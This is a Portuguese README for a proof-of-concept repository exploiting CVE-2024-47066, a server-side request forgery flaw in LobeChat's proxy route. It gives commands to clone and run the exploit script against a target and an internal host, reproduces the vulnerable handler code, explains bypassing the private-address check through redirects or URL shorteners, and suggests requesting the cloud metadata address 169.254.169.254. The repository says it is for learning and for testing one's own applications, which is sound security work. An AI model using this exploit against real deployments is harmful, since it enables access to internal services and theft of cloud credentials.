
Prova de Conceito para CVE-2024-47066
★ CVE-2024-47066 LobeChat SSRF PoC ★
CVE-2024-47066 : Lobe Chat é um framework de chat de inteligência artificial de código aberto. Antes da versão 1.19.13, a proteção contra server-side request forgery implementada em src/app/api/proxy/route.ts não considera redirecionamentos e poderia ser contornada quando um atacante fornece uma URL externa maliciosa que redireciona para recursos internos, como uma rede privada ou endereço de loopback. A versão 1.19.13 contém uma correção aprimorada para o problema.
Repórter: a1loy
https://github.com/user-attachments/assets/2c4a3be0-5732-48f5-a96c-d361fd914fec
git clone https://github.com/l8BL/CVE-2024-47066.git
cd CVE-2024-47066
cd docker
docker-compose up -d
(Externo) LodeChat --> ATAQUE SSRF --> (Interno) http://www.internal-service:4000
pip install -r requirements.txt
python3 CVE-2024-47066.py -v <URL_TO_EXPLOIT> -i <URL_TO_REQUEST>
python3 CVE-2024-47066.py -v http://localhost:3210 -i http://www.internal-service:4000
CVE-2024-47066


import { isPrivate } from 'ip';
import { NextResponse } from 'next/server';
import dns from 'node:dns';
import { promisify } from 'node:util';
const lookupAsync = promisify(dns.lookup);
export const runtime = 'nodejs';
/**
* just for a proxy
*/
export const POST = async (req: Request) => {
const url = new URL(await req.text());
let address;
try {
const lookupResult = await lookupAsync(url.hostname);
address = lookupResult.address;
} catch (err) {
console.error(`${url.hostname} DNS parser error:`, err);
return NextResponse.json({ error: 'DNS parser error' }, { status: 504 });
}
const isInternalHost = isPrivate(address);
if (isInternalHost)
return NextResponse.json({ error: 'Not support internal host proxy' }, { status: 400 });
const res = await fetch(url.toString());
return new Response(res.body, { headers: res.headers });
};
Abaixo da linha 26, não há nenhuma verificação para determinar a resposta de redirecionamento. Então, ao usar um encurtador de URL, você pode facilmente contornar a função "isPrivate()".
Faça uma requisição para http://169.254.169.254
Este repositório não se destina a ser um exploit de SSRF para CVE-2024-47066. O objetivo deste projeto é ajudar as pessoas a aprender sobre esta vulnerabilidade e, talvez, testar suas próprias aplicações.